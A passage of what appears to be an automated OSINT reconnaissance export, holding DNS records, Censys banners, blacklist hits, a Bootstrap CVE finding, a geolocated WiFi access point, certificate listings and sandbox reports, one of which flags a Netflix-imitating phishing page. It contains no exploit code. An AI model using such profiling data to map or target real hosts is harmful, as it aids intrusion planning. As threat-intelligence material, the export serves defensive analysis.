"sub.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-10-03T20:37:50.410080500Z"}, "kfplastics.com.au": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:22:37.294872821Z"}, "ozvi.net": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:04:48.328410124Z"}, "romainebrain.dev": {"record_type": "AAAA", "resolved_at": "2023-02-18T04:11:46.139927410Z"}, "persaldo-treuhand.ch": {"record_type": "AAAA", "resolved_at": "2023-01-07T12:29:30.392242949Z"}, "133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-10-05T17:45:47.967622672Z"}, "static.sampledu.com": {"record_type": "AAAA", "resolved_at": "2023-02-01T22:23:03.363402875Z"}, "cpcontacts.madares.app": {"record_type": "AAAA", "resolved_at": "2023-04-16T12:14:57.712576745Z"}, "vadyba.lt": {"record_type": "AAAA", "resolved_at": "2023-03-19T16:29:40.486687881Z"}, "openspeedtest.ovride.net": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:05:02.904720123Z"}, "www.3e-wellness.com": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:03:48.794666765Z"}, "sign.moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-28T16:39:39.465293148Z"}, "405.hjs.my.id": {"record_type": 
"AAAA", "resolved_at": "2023-04-12T11:14:59.074372516Z"}, "password.moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-25T16:38:19.046997106Z"}, "mail.wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-30T17:30:49.591604261Z"}, "www.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-09-25T19:02:08.754559807Z"}, "beautybeyondhair.net": {"record_type": "AAAA", "resolved_at": "2023-04-07T18:46:00.761081322Z"}, "beautybeyondhair.buzz": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:48:08.422852392Z"}, "wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-23T17:07:04.797789596Z"}, "askapkmod.com": {"record_type": "AAAA", "resolved_at": "2022-12-26T12:52:46.077237913Z"}, "gbdfdm.cn": {"record_type": "AAAA", "resolved_at": "2023-02-17T02:28:21.988085793Z"}, "www.cylindermowers.com.au": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:22:39.710895641Z"}, "moeking.me": {"record_type": "AAAA", "resolved_at": "2022-09-30T15:32:44.686639976Z"}, "gh.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-09-24T19:46:42.025854438Z"}, "karriere-job-booster.at": {"record_type": "AAAA", "resolved_at": "2023-04-30T12:17:10.484433310Z"}, "www.wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-16T17:06:44.448663582Z"}, "de.133335.xyz": {"record_type": "AAAA", "resolved_at": "2022-10-04T17:06:49.855589981Z"}}, "names": ["www.wolny.poker", "www.133335.xyz", "wolny.poker", "uncoveryourconfidence.org", "karriere-job-booster.com", "static.sampledu.com", "ozvi.net", "de.133335.xyz", "panel.moeking.me", "gh.133335.xyz", "sub.133335.xyz", "www.cylindermowers.com.au", "vadyba.lt", "beautybeyondhair.buzz", "cpcontacts.madares.app", "133335.xyz", "kfplastics.com.au", "openspeedtest.ovride.net", "password.moeking.me", "405.hjs.my.id", "beautybeyondhair.net", "moeking.me", "romainebrain.dev", "sign.moeking.me", "www.3e-wellness.com", "gbdfdm.cn", "persaldo-treuhand.ch", "karriere-job-booster.at", "askapkmod.com", "mail.wolny.poker"]}, 
"services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://[2a06:98c1:3120::1]/"}, "response": {"body": | 2a06:98c1:3120::1 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.64): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-14042
Score: Unknown
Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:11:21 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60313, Germany, Europe | 46.101.229.70 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-004
(Net ID: 00:04:E2:F4:8A:F5) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.158): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:22 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.108.153 |
| 2023-05-12 02:48:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://gabu0912.github.io/netflux/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e10_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_e10_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_e10_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3600"\n "IsoScope_e10_ConnHashTable<3600>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_e10_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_e10_IE_EarlyTabStart_0x880_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "104.194.8.120:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network 
Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"gabu0912.github.io"\n "i.ibb.co"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "netflux_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar37C6.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3023.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2DAE.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2F85.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2CA1.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2CD1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': 
u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab2C80.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2C80.tmp]- [targetUID: 00000000-00002972]\n "Cab37C5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab37C5.tmp]- [targetUID: 00000000-00002972]\n "Cab2F84.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2F84.tmp]- [targetUID: 00000000-00002972]\n "Cab3022.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab3022.tmp]- [targetUID: 
00000000-00002972]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002972]\n "Cab2CC1.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2CC1.tmp]- [targetUID: 00000000-00002972]\n "Cab2DAD.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2DAD.tmp]- [targetUID: 00000000-00002972]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe78175b9357b566b.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{616d4f39-ebb5-11ed-9a79-08002777c70f}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df550c4a9bcc627f72.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{616d4f3b-ebb5-11ed-9a79-08002777c70f}.dat"\n "iexplore.exe" reads file "c:\\users\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\favorites\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\desktop\\desktop.ini"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', 
u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{616d4f39-ebb5-11ed-9a79-08002777c70f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfe78175b9357b566b.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{616d4f3b-ebb5-11ed-9a79-08002777c70f}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df550c4a9bcc627f72.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Tar37C6.tmp" has type "data"- Location: [%TEMP%\\Tar37C6.tmp]- [targetUID: 00000000-00002972]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab2C80.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP 
setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2C80.tmp]- [targetUID: 00000000-00002972]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003600]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has | 185.199.110.153 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft subsidiaries | cdn-185-199-111-153.github.com |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.84): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | www.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 
183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, 
u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Bootstrap | funny.battleb0t.xyz |
| 2023-05-12 02:55:58 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://mu-ldn.com/manifest.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /manifest.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: mu-ldn.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f04_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f04_IE_EarlyTabStart_0xf70_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_f04_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3844"\n "IsoScope_f04_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f04_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_f04_ConnHashTable<3844>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3844"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1F16.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar1EA6.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': 
u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab1F15.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1EA5.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "8G5IMZ7J.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8G5IMZ7J.txt]- [targetUID: 00000000-00003844]\n Dropped file: "SKIYYQQ6.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SKIYYQQ6.txt]- [targetUID: 00000000-00003844]\n Dropped file: "JIRKGKO6.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JIRKGKO6.txt]- [targetUID: 00000000-00003844]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 
